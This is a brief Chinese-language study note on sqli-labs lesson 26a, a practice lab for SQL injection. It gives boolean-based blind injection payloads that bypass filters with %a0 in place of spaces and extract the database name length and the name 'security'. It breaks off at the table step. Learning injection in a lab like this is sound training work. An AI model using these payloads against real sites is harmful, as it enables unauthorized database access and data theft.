sqli-labs学习笔记 DAY5

DAY 5 sqli-labs lesson 26a 闭合符号为单引号和括号,并且不回显错误,如果服务器是Linux,尝试%a0代替空格,这里尝试使用布尔型 数据库名长度:?id=1’)&&if(length(database())=8,1,0)||('0 爆库:?id=1’)&&if(left(database(),8)=‘security’,1,0)||('0 爆表: 当返回为真,长度为914
相关文章
相关标签/搜索